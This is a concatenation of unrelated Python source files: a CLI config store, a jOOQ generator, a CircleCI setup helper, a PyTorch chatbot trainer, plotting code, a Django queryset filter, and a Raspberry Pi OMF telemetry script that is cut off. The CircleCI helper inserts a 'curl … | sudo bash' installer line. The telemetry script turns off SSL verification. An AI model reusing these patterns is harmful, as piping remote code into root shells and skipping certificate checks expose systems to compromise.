-> List[SourceFileDependency]:
"""Dependencies to target or None """
if target not in cls._sourceFileDependenciesByTarget:
return []
else:
return cls._sourceFileDependenciesByTarget[target]
@classmethod
def sourceDependencies(
cls,
source: Optional[ModelSourceFile] = None,
target: Optional[ModelSourceFile] = None,
metamodelDependency: Optional[MetamodelDependency] = None) \
-> List[SourceFileDependency]:
"""Return sources dependencies according either to the
source source file, target source file, or metamodel
dependency.
If no parameter is provided then return all dependencies.
"""
# (1) First filter by source and target
if source is None and target is None:
# all dependencies
deps = cls._allSourceFileDependencies
elif source is not None and target is None:
# return dependencies from source
deps = cls._outSourceDependencies(source)
elif source is None and target is not None:
# return dependencies to target
deps = cls._inSourceDependencies(target)
else:
# return dependencies between source and target
deps = [
d for d in cls._outSourceDependencies(source)
if d.target == target
]
# (2) Second filter with metamodelDependency
if metamodelDependency is None:
return deps
else:
return [
dep for dep in deps
if dep.metamodelDependency == metamodelDependency
]
@classmethod
def sourceDependency(cls,
source: ModelSourceFile,
target: ModelSourceFile)\
-> Optional[SourceFileDependency]:
"""Return the dependency between source and target"""
d = cls.sourceDependencies(source=source, target=target)
if len(d) == 1:
return d[0]
else:
return None
@classmethod
def sourceFileList(cls, origins=None):
if origins is None:
origins = cls.sourceFiles()
visited = []
output = []
# def visit(source_file):
# if source_file not in visited:
# visited.insert(0, source_file)
# for x in source_file.usedSourceFiles:
# if x not in visited:
# visit(x)
# for x in origins:
# visit(x)
def visit(source_file):
if source_file not in visited:
visited.append(source_file)
for x in source_file.usedSourceFiles:
if x not in visited:
visit(x)
output.append(source_file)
for x in list(origins):
visit(x)
return output
|
from os import X_OK, pardir
print("""
**************************************
** Welcome to the Snakes Cafe! **
** Please see our menu below. **
**
** To quit at any time, type "quit" **
**************************************
Appetizers
----------
Wings
Cookies
Spring Rolls
Entrees
-------
Salmon
Steak
Meat Tornado
A Literal Garden
Desserts
--------
Ice Cream
Cake
Pie
Drinks
------
Coffee
Tea
Unicorn Tears
***********************************
** What would you like to order? **
***********************************
""")
menu = {
"WINGS": 0,
"COOKIES": 0,
"SPRING ROLLS": 0,
"SALMON": 0,
"MEAT TORNADO": 0,
"A LITERAL GARDEN": 0,
"ICE CREAM": 0,
"CAKE": 0,
"PIE": 0,
"TEA": 0,
"UNICORN TEARS": 0,
}
def handle_input(x):
to_upper = x.upper()
x = to_upper
menu[x] += 1
return(f"** {menu[x]} order(s) of {x} have been added to your meal **")
while True:
user_input = input("> ")
if user_input == 'quit':
print('Thanks for your order - BYE', menu)
break
print(handle_input(user_input))
|
import base64
import json
import os.path
from os.path import expanduser
from ditto.core import logger
def get(key):
cls = DittoConfig()
val = cls.get(key)
return val
def not_set(key):
cls = DittoConfig()
val = cls.get(key)
return val is None
def set(key, val):
cls = DittoConfig()
cls.set(key, val)
class DittoConfig:
def __init__(self):
self.config_path = os.path.abspath(os.path.join(expanduser("~"), ".ditto-cli"))
self.get_config()
def get_config(self):
if not os.path.isfile(self.config_path):
self.set_config({})
config_file = open(self.config_path, "r")
data = json.load(config_file)
config_file.close()
return data
def set_config(self, config):
config_file = open(self.config_path, 'w+')
config_file.write(json.dumps(config, indent=4, sort_keys=True))
config_file.close()
def get(self, key):
config = self.get_config()
if key in config:
return base64.b64decode(config[key].decode('utf-8'))
else:
return None
def set(self, key, value, overwrite=True):
config = self.get_config()
if overwrite or (key not in config):
config[key] = base64.b64encode(value.encode('utf-8'))
self.set_config(config)
def rm(self, key):
config = dict(self.get_config())
del config[key]
self.set_config(config)
def list(self):
config = self.get_config()
for key in config:
logger.log(key + ': ' + self.get(key))
|
#!/usr/bin/env python
# encoding: utf-8
"""
Handling of the generate subcommand
"""
# ---------------------------------------------------------------------------
# Standard imports:
import os
import subprocess
import shutil
# Local imports
from .. import codegen
from .. import modelutils
from .. import utils
from . import common
# ---------------------------------------------------------------------------
ENUM_PACKAGE_TPL = "{base}.{schema}.enums"
ENUM_CONVERTER_PACKAGE_TPL = ENUM_PACKAGE_TPL + ".converters"
DB_QUERY_PACKAGE_TPL = "{base}.{schema}.db"
def _generate_db_schema_ddl(metadata, schema, output_dir):
utils.print_section_header("Database Creation DDL")
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
engines = ("mysql",)
for engine in engines:
file_name = f"full_ddl.{schema.lower()}.{engine}.sql"
file_path = os.path.join(output_dir, file_name)
with open(file_path, "w") as fsqlout:
fsqlout.write(metadata.ddl(engine))
utils.print_action(f"Generating database schema for {engine}")
utils.print_generated_file(file_name)
utils.print_end_action()
def _find_java():
"""
Provide the java executable path, searching first in JAVA_HOME, then in the
PATH
"""
java_home = os.environ.get("JAVA_HOME", None)
if java_home is not None:
java_path = os.path.join(java_home, "bin", "java")
if os.path.isfile(java_path) and os.access(java_path, os.X_OK):
return java_path
java_path = shutil.which("java")
return java_path
def _run_jooq(java, config_file, classpath=None):
"""
Run the jOOQ generator with the give configuration file and classpath
"""
if java is None:
# No java path was explicitly provided, so search
java = _find_java()
command = [java]
if classpath is not None:
command.append("-classpath")
command.append(classpath)
command.append("org.jooq.util.GenerationTool")
command.append(config_file)
print(" ".join(command))
try:
subprocess.check_call(command)
except subprocess.CalledProcessError as cpe:
return cpe
def generate(args):
modelutils.validate_model(args.dbmodel)
schema_name = args.dbmodel.schema_name()
package_schema_name = schema_name.lower()
# Add schema to packages
enum_package = ENUM_PACKAGE_TPL.format(
base=args.java_package, schema=package_schema_name
)
enum_conv_package = ENUM_CONVERTER_PACKAGE_TPL.format(
base=args.java_package, schema=package_schema_name
)
db_query_package = DB_QUERY_PACKAGE_TPL.format(
base=args.java_package, schema=package_schema_name
)
code_generator = codegen.EnumCodeGenerator(
enums=args.dbmodel.enums,
code_dir=args.code_dir,
config_dir=args.config_dir,
enum_package=enum_package,
converter_package=enum_conv_package,
model_file=args.model_file,
)
# Generate Java enums and Converters for jOOQ
code_generator.generate_enum_java_code()
# Generate DB scripts for all used engines
_generate_db_schema_ddl(args.dbmodel.metadata, package_schema_name, args.sql_dir)
# Find the columns that use enum, boolean, etc. types to create a jOOQ mapping for them
type_mappings = common.get_type_mappings(args.dbmodel.metadata)
# Generate the XML config for the jOOQ code generator
jooq_config_file = code_generator.generate_jooq_config(
type_mappings, args.dbsettings, schema_name, db_query_package
)
if args.do_jooq:
# Create a temporary database, run the jOOQ generator on it, then remove it
with args.dbmodel.metadata.db_instance(args.dbsettings, not args.keep_db):
utils.print_action(
f"Running jOOQ generator on temporary database {args.dbsettings.name}"
)
error = _run_jooq(args.java, jooq_config_file, args.classpath)
utils.print_end_action(error)
if error is not None:
raise error
|
from os.path import isfile, join, exists
import re
import click
import logging
from stable_world.output.helpers import indent
from stable_world.py_helpers import ConfigParser
from stable_world import errors
from stable_world.interact.yaml_insert import yaml_add_lines_to_machine_pre
from .base import BucketConfigurator
logger = logging.getLogger(__name__)
GIT_URL_RE = re.compile(
'^(git@(?P<sshhost>[\w.]+):)'
'|(https://(.*?@)?(?P<httphost>[\w.]+)/)'
'(?P<bucket>[\w.]+/[\w.]+?)'
'(.git)?$'
)
class CircleBucketHelper(BucketConfigurator):
@classmethod
def is_valid(cls, working_dir):
logger.info('Found CircleCI bucket "{}"'.format(working_dir))
if isfile(join(working_dir, 'circle.yml')):
return True
logger.info('Could not find circle.yml file in {}'.format(working_dir))
def get_git_remote(self):
parser = ConfigParser()
parser.read(join(self.working_dir, '.git', 'config'))
return parser.get('remote "origin"', 'url')
def __init__(self, *args):
BucketConfigurator.__init__(self, *args)
def setup(self):
# TODO: configur git remote
click.echo(' Setup your CircleCI Bucket:\n')
uri = self.get_git_remote()
match = GIT_URL_RE.match(uri)
if not match:
raise errors.UserError('Literally can not even match %s' % uri)
self.values = GIT_URL_RE.match(uri).groupdict()
self.initial_bucket_name = self.values.get('bucket').replace('/', '-')
def setup_bucket_env(self):
host = self.values.get('httphost') or self.values.get('sshhost')
repo_part = None
if host == 'github.com':
repo_part = 'gh'
elif host == 'bitbucket.org':
repo_part = 'bb'
bucket = self.values.get('bucket')
circle_url = 'https://circleci.com/{repo_part}/{bucket}/edit#env-vars'.format(
repo_part=repo_part, bucket=bucket
)
click.echo('')
token = self.get_token()
click.echo(
' You need to navigate to your circleci bucket '
'and set a secure environment variable:'
)
click.echo('\n Go to ', nl=False)
click.secho('{}'.format(circle_url), fg='blue', underline=True, nl=False)
click.echo(' and click "Add Variable"\n')
click.echo(' Name:')
click.secho(' STABLE_WORLD_TOKEN', dim=True)
click.echo(' Value:')
click.secho(' {}'.format(token), dim=True)
ok = click.confirm('\n Launch browser', default=True)
if ok:
click.launch(circle_url)
def setup_bucket_ci(self):
circle_yaml = join(self.working_dir, 'circle.yml')
if exists(circle_yaml):
with open(circle_yaml) as fd:
text = fd.read()
else:
text = ''
add_lines = [
'curl {url}/install | sudo bash -s -- rc'.format(url=self.site_url),
'stable.world use -b {bucket_name} -t ' +
'build${{CIRCLE_BUILD_NUM}}'.format(bucket_name=self.bucket_name)
]
default = indent(yaml_add_lines_to_machine_pre('', add_lines), ' + ')
if 'stable.world use' in text:
click.echo(' It looks like you are already using stable.world')
click.echo(' Your confiuration should looke like this:')
click.echo('')
click.secho(default, fg='green')
else:
new_text = yaml_add_lines_to_machine_pre(text, add_lines)
with open(circle_yaml, 'w') as fd:
fd.write(new_text)
click.echo(' The following lines were added to your circle.yml')
click.echo('')
click.secho(default, fg='green')
click.echo('')
click.echo(' You need commit this and push to your repo')
click.pause(' Got it? (Press any key to continue ...)')
def setup_bucket_name(self):
bucket_name = self.initial_bucket_name
while 1:
if bucket_name:
ok = click.confirm(
' %30s: \'%s\'?' % ('name your bucket', bucket_name),
default=True
)
click.echo('')
if ok:
try:
self.client.add_bucket(bucket_name)
break
except errors.DuplicateKeyError:
click.echo('')
tml = ' The bucket "%s" alreadys exists'
click.secho(' Warning: ', nl=False, fg='magenta')
click.echo(tml % bucket_name)
click.echo(' Bucket names must be unique')
ok = click.confirm('Use existing bucket?', default=False)
if ok:
break
else:
continue
bucket_name = click.prompt(' %30s' % 'name your bucket')
self.bucket_name = bucket_name
|
import numpy as np
import random
import json
import nltk
nltk.download('punkt')
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
from nltk_utils import bag_of_words, tokenize, stem
from model import NeuralNet
with open('intents.json', 'r') as f:
intents = json.load(f)
all_words = []
tags = []
xy = []
# loop through each sentence in our intents patterns
#(lặp lại từng câu trong các mẫu ý định của chúng tôi)
for intent in intents['intents']:
tag = intent['tag']
# add to tag list (thêm vào danh sách thẻ)
tags.append(tag)
for pattern in intent['patterns']:
# tokenize each word in the sentence (mã hóa từng từ trong câu)
w = tokenize(pattern)
# add to our words list (thêm vào danh sách từ của chúng tôi)
all_words.extend(w)
# add to xy pair (thêm vào cặp xy)
xy.append((w, tag))
# stem and lower each word (gốc và hạ thấp từng từ)
ignore_words = ['?', '.', '!']
all_words = [stem(w) for w in all_words if w not in ignore_words]
# remove duplicates and sort (loại bỏ các bản sao và sắp xếp)
all_words = sorted(set(all_words))
tags = sorted(set(tags))
print(len(xy), "patterns")
print(len(tags), "tags:", tags)
print(len(all_words), "unique stemmed words:", all_words)
# create training data (tạo tệp dữ liệu train)
X_train = []
y_train = []
for (pattern_sentence, tag) in xy:
# X: bag of words for each pattern_sentence (túi từ cho mỗi câu mẫu)
bag = bag_of_words(pattern_sentence, all_words)
X_train.append(bag)
# y: PyTorch CrossEntropyLoss needs only class labels, not one-hot
# Thư viện Pytorch chỉ cần labels một lớp câu, không phải lable từng câu.
label = tags.index(tag)
y_train.append(label)
X_train = np.array(X_train)
y_train = np.array(y_train)
# Hyper-parameters (Siêu tham số)
num_epochs = 1000
batch_size = 8
learning_rate = 0.001
input_size = len(X_train[0])
hidden_size = 8
output_size = len(tags)
print(input_size, output_size)
class ChatDataset(Dataset):
def __init__(self):
self.n_samples = len(X_train)
self.x_data = X_train
self.y_data = y_train
# support indexing such that dataset[i] can be used to get i-th sample
#hỗ trợ lập chỉ mục để tập dữ liệu [i] có thể được sử dụng để lấy mẫu thứ i
def __getitem__(self, index):
return self.x_data[index], self.y_data[index]
# we can call len(dataset) to return the size
#chúng ta có thể gọi len (dataset) để trả về kích thước
def __len__(self):
return self.n_samples
dataset = ChatDataset()
train_loader = DataLoader(dataset=dataset,
batch_size=batch_size,
shuffle=True,
num_workers=0)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = NeuralNet(input_size, hidden_size, output_size).to(device)
# Loss and optimizer (Mất mát và tối ưu hóa)
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# Train the model (Đào tạo mô hình)
for epoch in range(num_epochs):
for (words, labels) in train_loader:
words = words.to(device)
labels = labels.to(dtype=torch.long).to(device)
# Forward pass (Chuyển tiếp qua)
outputs = model(words)
# if y would be one-hot, we must apply
# labels = torch.max(labels, 1)[1]
loss = criterion(outputs, labels)
# Backward and optimize (Lùi lại và tối ưu hóa)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (epoch+1) % 100 == 0:
print (f'Epoch [{epoch+1}/{num_epochs}], Loss: {loss.item():.4f}')
print(f'final loss: {loss.item():.4f}')
data = {
"model_state": model.state_dict(),
"input_size": input_size,
"hidden_size": hidden_size,
"output_size": output_size,
"all_words": all_words,
"tags": tags
}
FILE = "data.pth"
torch.save(data, FILE)
print(f'training complete. file saved to {FILE}')
|
import os
import sys
import bokeh.layouts as bkl
import bokeh.plotting as bkp
import numpy as np
# make it so we can import models/etc from parent folder
sys.path.insert(1, os.path.join(sys.path[0], '../common'))
from plotting import *
from bokeh.io import export_svgs
import cairosvg
size_x_axis = False
trial_num = 1
nm = ('IHT-2', 'A-IHT II')
Ms = [0, 20, 50, 100]
np.random.seed(5)
# plot the KL figure
# plot the sequence of coreset pts and comparison of nonopt + opt
res = np.load('results/results_' + nm[0] + '_' + str(trial_num) + '.npz')
x = res['x']
wt = res['w']
Sig = res['Sig']
mup = res['mup']
Sigp = res['Sigp']
muwt = res['muw']
Sigwt = res['Sigw']
# if dim x > 2, project onto two random orthogonal axes
if x.shape[1] > 2:
##centering on the true data gen dist
# true_th = np.ones(mup.shape[0])
# x-= true_th
# mup -= true_th
# muwt -= true_th
# project onto two random axes
a1 = np.random.randn(x.shape[1])
a2 = np.random.randn(x.shape[1])
a1 /= np.sqrt((a1 ** 2).sum())
a2 -= a2.dot(a1) * a1
a2 /= np.sqrt((a2 ** 2).sum())
a = np.hstack((a1[:, np.newaxis], a2[:, np.newaxis]))
x = x.dot(a)
mup = mup.dot(a)
muwt = muwt.dot(a)
Sig = a.T.dot(Sig.dot(a))
Sigp = a.T.dot(Sigp.dot(a))
Sigwttmp = np.zeros((Sigwt.shape[0], 2, 2))
for i in range(Sigwt.shape[0]):
Sigwttmp[i, :, :] = a.T.dot(Sigwt[i, :, :].dot(a))
Sigwt = Sigwttmp
##shift everything to be back to true th
# true_th = true_th[:2]
# x += true_th
# mup += true_th
# muwt += true_th
figs = []
for m in Ms:
x_range = (-4.2, 4.2)
y_range = (-3, 5.4)
fig = bkp.figure(x_range=x_range, y_range=y_range, plot_width=750, plot_height=750)
preprocess_plot(fig, '24pt', False, False)
msz = np.where((wt > 0).sum(axis=1) <= m)[0][-1]
fig.scatter(x[:, 0], x[:, 1], fill_color='black', size=10, alpha=0.09)
if size_x_axis:
fig.scatter(x[:, 0], x[:, 1], fill_color='black',
size=10 * (wt[msz, :] > 0) + 40 * wt[msz, :] / wt[msz, :].max(), line_color=None)
else:
fig.scatter(x[:, 0], x[:, 1], fill_color='black', size=10 * (wt[msz, :] > 0) + 40 * wt[m, :] / wt[m, :].max(),
line_color=None)
plot_gaussian(fig, mup, (4. / 9.) * Sigp, (4. / 9.) * Sig, 'black', 17, 9, 1, 1, 'solid', 'Exact')
if size_x_axis:
plot_gaussian(fig, muwt[msz, :], (9. / 9.) * Sigwt[msz, :], (9. / 9.) * Sig, pal[4], 17, 9, 1, 1, 'solid',
nm[1] + ', size ' + str((wt[msz, :] > 0).sum()))
else:
plot_gaussian(fig, muwt[m, :], (4. / 9.) * Sigwt[m, :], (4. / 9.) * Sig, pal[4], 17, 9, 1, 1, 'solid',
nm[1] + ', ' + str(m) + ' pts')
postprocess_plot(fig, '24pt', orientation='horizontal', glyph_width=80)
fig.legend.background_fill_alpha = 0.
fig.legend.border_line_alpha = 0.
# f.legend.visible=False
fig.xaxis.visible = False
fig.yaxis.visible = False
figs.append(fig)
# figure output
fig.output_backend = 'svg'
fig_name = 'exp1-coresets_' + 'm' + str(m) +'_id_' + str(trial_num)
export_svgs(fig, filename=fig_name + '.svg')
cairosvg.svg2pdf(
file_obj=open(fig_name + '.svg', "rb"), write_to=fig_name + '.pdf')
bkp.show(bkl.gridplot([figs]))
|
from django.db.models.query_utils import Q
from care.facility.models.patient_consultation import PatientConsultation
from care.users.models import User
from care.utils.cache.cache_allowed_facilities import get_accessible_facilities
def get_consultation_queryset(user):
queryset = PatientConsultation.objects.all()
if user.is_superuser:
return queryset
if user.user_type >= User.TYPE_VALUE_MAP["StateLabAdmin"]:
q_filters = Q(facility__state=user.state)
q_filters |= Q(patient__facility__state=user.state)
queryset = queryset.filter(q_filters)
elif user.user_type >= User.TYPE_VALUE_MAP["DistrictLabAdmin"]:
q_filters = Q(facility__district=user.district)
q_filters |= Q(patient__facility__district=user.district)
queryset = queryset.filter(q_filters)
else:
allowed_facilities = get_accessible_facilities(user)
q_filters = Q(facility__id__in=allowed_facilities)
q_filters |= Q(patient__facility__id__in=allowed_facilities)
q_filters |= Q(assigned_to=user)
q_filters |= Q(patient__assigned_to=user)
queryset = queryset.filter(q_filters)
return queryset
|
#Copyright 2018 OSIsoft, LLC
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
#<http://www.apache.org/licenses/LICENSE-2.0>
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
# NOTE: this script was designed using the v1.0
# version of the OMF specification, as outlined here:
# http://omf-docs.readthedocs.io/en/v1.0/index.html
# ************************************************************************
# Import necessary packages
# ************************************************************************
# Import packages
import json
import time
import platform
import socket
import datetime
import random # Used to generate sample data; comment out this line if real data is used
import requests
# Import any special packages needed for a particular hardware platform,
# for example, for a Raspberry PI,
# import RPi.GPIO as GPIO
import sense_hat # Used for controlling the Sense Hat
import sys # Used to parse error messages
import os # Used to sync the internal clock
import socket # Used to get the current host name
import webcolors # Used to allow easily referencing colors by name
# ************************************************************************
# Specify constant values (names, target URLS, et centera) needed by the script
# ************************************************************************
# Specify the name of this device, or simply use the hostname; this is the name
# of the PI AF Element that will be created, and it'll be included in the names
# of PI Points that get created as well
DEVICE_NAME = (socket.gethostname()) + " Raspberry Pi"
#DEVICE_NAME = "MyCustomDeviceName"
# Specify a device location (optional); this will be added as a static
# string attribute to the AF Element that is created
DEVICE_LOCATION = "IoT Test Lab"
# Specify the name of the Assets type message; this will also end up becoming
# part of the name of the PI AF Element template that is created; for example, this could be
# "AssetsType_RaspberryPI" or "AssetsType_Dragonboard"
# You will want to make this different for each general class of IoT module that you use
ASSETS_MESSAGE_TYPE_NAME = DEVICE_NAME + "_assets_type"
#ASSETS_MESSAGE_TYPE_NAME = "assets_type" + "IoT Device Model 74656" # An example
# NoteL you can repalce DEVICE_NAME with DEVICE_TYPE if you'd like to use a common type for multiple assets
# Similarly, specify the name of for the data values type; this should likewise be unique
# for each general class of IoT device--for example, if you were running this
# script on two different devices, each with different numbers and kinds of sensors,
# you'd specify a different data values message type name
# when running the script on each device. If both devices were the same,
# you could use the same DATA_VALUES_MESSAGE_TYPE_NAME
DATA_VALUES_MESSAGE_TYPE_NAME = DEVICE_NAME + "_data_values_type"
#DATA_VALUES_MESSAGE_TYPE_NAME = "data_values_type" + "IoT Device Model 74656" # An example
# NoteL you can repalce DEVICE_NAME with DEVICE_TYPE if you'd like to use a common type for multiple assets
# Store the id of the container that will be used to receive live data values
DATA_VALUES_CONTAINER_ID = DEVICE_NAME + "_data_values_container"
# Specify the number of seconds to sleep in between value messages
NUMBER_OF_SECONDS_BETWEEN_VALUE_MESSAGES = 2
# Specify whether you're sending data to OSIsoft cloud services or not
SEND_DATA_TO_OSISOFT_CLOUD_SERVICES = False
# Specify the address of the destination endpoint; it should be of the form
# http://<host/ip>:<port>/ingress/messages
# For example, "https://myservername:8118/ingress/messages"
TARGET_URL = "https://pisystem.cloudapp.azure.com:5460/ingress/messages"
# !!! Note: if sending data to OSIsoft cloud services,
# uncomment the below line in order to set the target URL to the OCS OMF endpoint:
#TARGET_URL = "https://dat-a.osisoft.com/api/omf"
# Specify the producer token, a unique token used to identify and authorize a given OMF producer. Consult the OSIsoft Cloud Services or PI Connector Relay documentation for further information.
PRODUCER_TOKEN = "OMFv1"
#PRODUCER_TOKEN = "778408" # An example
# !!! Note: if sending data to OSIsoft cloud services, the producer token should be the
# security token obtained for a particular Tenant and Publisher; see
# http://qi-docs.readthedocs.io/en/latest/OMF_Ingress_Specification.html#headers
#PRODUCER_TOKEN = ""
# ************************************************************************
# Specify options for sending web requests to the target
# ************************************************************************
# If self-signed certificates are used (true by default),
# do not verify HTTPS SSL certificates; normally, leave this as is
VERIFY_SSL = False
# Specify the timeout, in seconds, for sending web requests
# (if it takes longer than this to send a message, an error will be thrown)
WEB_REQUEST_TIMEOUT_SECONDS = 30
# ************************************************************************
# Helper function: run any code needed to initialize local sensors, if necessary for this hardware
# ************************************************************************
# Below is where you can initialize any global variables that are needed by your applicatio;
# certain sensors, for example, will require global interface or sensor variables
# myExampleInterfaceKitGlobalVar = None
# Specify whether the lights should turn off at night;
# if set to true, LEDs will be disabled between 10 PM - 7 AM
NIGHT_MODE_ENABLED = True
# Define the color bar that will be used for each row of LEDs
RED_TO_GREEN_COLOR_BAR = [
webcolors.name_to_rgb('MAGENTA'),
webcolors.name_to_rgb('RED'),
webcolors.name_to_rgb('ORANGE'),
webcolors.name_to_rgb('YELLOW'),
webcolors.name_to_rgb('YELLOWGREEN'),
webcolors.name_to_rgb('GREEN'),
webcolors.name_to_rgb('LightSeaGreen'),
webcolors.name_to_rgb('BLUE')
]
# Specify a default background color for LEDs
DEFAULT_BACKGROUND_COLOR = webcolors.name_to_rgb('navy')
# Initialize a global array for holding the most recent 8 readings
recentReadings = [1, 1, 1, 1, 1, 1, 1, 1]
# Initialize the sensor hat object
sense = sense_hat.SenseHat()
# The following function is where you can insert specific initialization code to set up
# sensors for a particular IoT module or platform
def initialize_sensors():
print("\n--- Sensors initializing...")
try:
#For a raspberry pi, for example, to set up pins 4 and 5, you would add
#GPIO.setmode(GPIO.BCM)
#GPIO.setup(4, GPIO.IN)
#GPIO.setup(5, GPIO.IN)
print("--- Waiting 10 seconds for sensors to warm up...")
time.sleep(10)
# Activate the compass, gyro, and accelerometer
sense.set_imu_config(True, True, True)
sense.show_message("Ready!")
print("Gyro initialized...")
print("--- Sensors initialized!")
# Sync the time on this device to an internet time server
try:
print('Syncing time...')
os.system('sudo service ntpd stop')
time.sleep(1)
os.system('sudo ntpd -gq')
time.sleep(1)
os.system('sudo service ntpd start')
print('Success! Time is ' + str(datetime.datetime.now()))
except:
print('Error syncing time!')
except Exception as ex:
# Log any error, if it occurs
print(str(datetime.datetime.now()) + " Error when initializing sensors: " + str(ex))
# ************************************************************************
# Helper function: REQUIRED: create a JSON message that contains sensor data values
# ************************************************************************
# The following function you can customize to allow this script to send along any
# number of different data values, so long as the values that you send here match
# up with the values defined in the "DataValuesType" OMF message type (see the next section)
# In this example, this function simply generates two random values for the sensor values,
# but here is where you could change this function to reference a library that actually
# reads from sensors attached to the device that's running the script
def create_data_values_message():
# Get the current timestamp in ISO format
timestamp = datetime.datetime.utcnow().isoformat() + 'Z'
# Read sensors
pitch, roll, yaw = sense.get_orientation_degrees().values()
degreesToNorth = sense.get_compass()
accelerationx, accelerationy, accelerationz = sense.get_accelerometer_raw().values()
# Update the sense hat display!
update_sense_hat_display(accelerationz)
# Assemble a JSON object containing the streamId and any data values
return [
{
"containerid": DATA_VALUES_CONTAINER_ID,
"values": [
{
"Time": timestamp,
# Again, in this example,
# we're just sending along random values for these two "sensors"
#"Raw Sensor Reading 1": 100*random.random(),
#"Raw Sensor Reading 2": 100*random.random()
"Humidity": sense.get_humidity(),
"Temperature": (sense.get_temperature_from_humidity() * 9/5 + 32),
"Pitch": pitch,
"Roll": roll,
"Yaw": yaw,
"Heading": degreesToNorth,
"X Acceleration": accelerationx,
"Y Acceleration": accelerationy,
"Z Acceleration": accelerationz
# If you wanted to read, for example, the digital GPIO pins
# 4 and 5 on a Raspberry PI,
# you would add to the earlier package import section:
# import RPi.GPIO as GPIO
# then add the below 3 lines to the above initialize_sensors
# function to set up the GPIO pins:
# GPIO.setmode(GPIO.BCM)
# GPIO.setup(4, GPIO.IN)
# GPIO.setup(5, GPIO.IN)
# and then lastly, you would change the two Raw Sensor reading lines above to
# "Raw Sensor Reading 1": GPIO.input(4),
# "Raw Sensor Reading 2": GPIO.input(5)
}
]
}
]
# ************************************************************************
# Helper function: OPTIONAL: updates sense hat display
# ************************************************************************
def update_sense_hat_display(newValue):
# Append the most recent value to end of the recent values array
recentReadings.append(newValue)
# Remove the oldest value from bin 0 of the recent values array
removedValue = recentReadings.pop(0)
# Get the max and min values of the recent values array
maxReading = max(recentReadings)
minReading = min(recentReadings)
# Scale all values in the recent values array using the max
# and the range (max - min); values now range from 0 to 7
scaledRecentReadings = []
for i in range(0, len(recentReadings), 1):
scaledRecentReading = 0
try:
scaledRecentReading = int(round(7 * abs(recentReadings[i] - minReading)/abs(maxReading - minReading)))
except:
print("Error when computing scaled reading; defaulting to 0")
# Subtract the scaled value from 7, to 'invert' the value,
# since the LED display is mounted upside-down
scaledRecentReadings.append(7 - scaledRecentReading)
# --------------------------------------------
# Test the hour of day; if it's too late or early, don't show the lights
currentHour = datetime.datetime.now().hour
if (NIGHT_MODE_ENABLED and ((currentHour > 22) or (currentHour < 7))):
# If it's too late or early, sleep 1 second, then turn off the lights
time.sleep(1)
sense.clear()
else:
# Otherwise, turn on the LEDs!
# Loop through the array, right to left (7 to 0);
# This lights up LEDs on the display one column at a time
for LEDcolumnIndex in range(7, -1, -1):
# Loop through all 8 LEDs in this column of LEDs
for LEDrowIndex in range(0, 8, 1):
# Determine the color for this LED by
# comparing the row (0-7) that this LED is in
# to the corresponding scaled recent reading
if LEDrowIndex >= scaledRecentReadings[LEDcolumnIndex]:
# In this case, the row number determines the LED color
# Higher row numbers will get "warmer" colors
sense.set_pixel(LEDcolumnIndex,LEDrowIndex,
RED_TO_GREEN_COLOR_BAR[LEDrowIndex])
else :
# Otherwise, by default, set this LED to the background color
sense.set_pixel(LEDcolumnIndex,LEDrowIndex,
DEFAULT_BACKGROUND_COLOR)
# ************************************************************************
# Helper function: REQUIRED: wrapper function for sending an HTTPS message
# ************************************************************************
# Define a helper function to allow easily sending web request messages;
# this function can later be customized to allow you to port this script to other languages.
# All it does is take in a data object and a message type, and it sends an HTTPS
# request to the target OMF endpoint
def send_omf_message_to_endpoint(action, message_type, message_json):
try:
# Assemble headers that contain the producer token and message type
# Note: in this example, the only action that is used is "create",
# which will work totally fine;
# to expand this application, you could modify it to use the "update"
# action to, for example, modify existing AF element template types
web_request_header = {
'producertoken': PRODUCER_TOKEN,
'messagetype': message_type,
'action': action,
'messageformat': 'JSON',
'omfversion': '1.0'
}
# !!! Note: if desired, ucomment the below line to print the outgoing message
print('\nOutgoing message: ' + json.dumps(message_json));
# Send the request, and collect the response; json.dumps is used to
# properly format the message JSON so that it can be sent as a web request
response = requests.post(
TARGET_URL,
headers=web_request_header,
data=json.dumps(message_json),
verify=VERIFY_SSL,
timeout=WEB_REQUEST_TIMEOUT_SECONDS
)
# Print a debug message, if desired; note: you should receive a
# response code 200 or 202 if the request was successful!
print(
'Response from sending a message of type ' +
'"{0}" with action "{1}": {2} {3}'.format(
message_type,
action,
response.status_code,
response.text
)
)
except Exception as ex:
# Log any error, if it occurs
print(str(datetime.datetime.now()) + " Error during web request: " + str(ex))
# ************************************************************************
# Turn off HTTPS warnings, if desired
# (if the default certificate configuration was used by the PI Connector)
# ************************************************************************
# Suppress insecure HTTPS warnings, if an untrusted certificate is used by the target endpoint
# Remove if targetting trusted targets
if not VERIFY_SSL:
requests.packages.urllib3.disable_warnings()
print(
'\n--- Setup: targeting endpoint "' + TARGET_URL + '"...' +
'\n--- Now sending types, defining containers, and creating assets and links...' +
'\n--- (Note: a successful message will return a 20X response code.)\n'
)
# ************************************************************************
# Create a JSON packet to define the types of streams that will be sent
# ************************************************************************
DYNAMIC_TYPES_MESSAGE_JSON = [
# ************************************************************************
# There are several different message types that will be used by this script, but
# you can customize this script for your own needs by modifying the types:
# First, you can modify the "AssetsType", which will allow you to customize which static
# attributes are added to the new PI AF Element that will be created, and second,
# you can modify the "DataValuesType", which will allow you to customize this script to send
# additional sensor values, in addition to (or instead of) the two shown here
# This values type is going to be used to send real-time values; feel free to rename the
# values from "Raw Sensor Reading 1" to, say, "Temperature", or "Pressure"
# Note:
# all keywords ("id", "type", "classification", etc. are case sensitive!)
# For a list of the specific keywords used in these messages,
# see http://omf-docs.readthedocs.io/
{
"id": DATA_VALUES_MESSAGE_TYPE_NAME,
"type": "object",
"classification": "dynamic",
"properties": {
"Time": {
"format": "date-time",
"type": "string",
"isindex": True
},
"Humidity": {
"type": "number"
},
"Temperature": {
"type": "number"
},
"Pitch": {
"type": "number"
},
"Roll": {
"type": "number"
},
"Yaw": {
"type": "number"
},
"Heading": {
"type": "number"
},
"X Acceleration": {
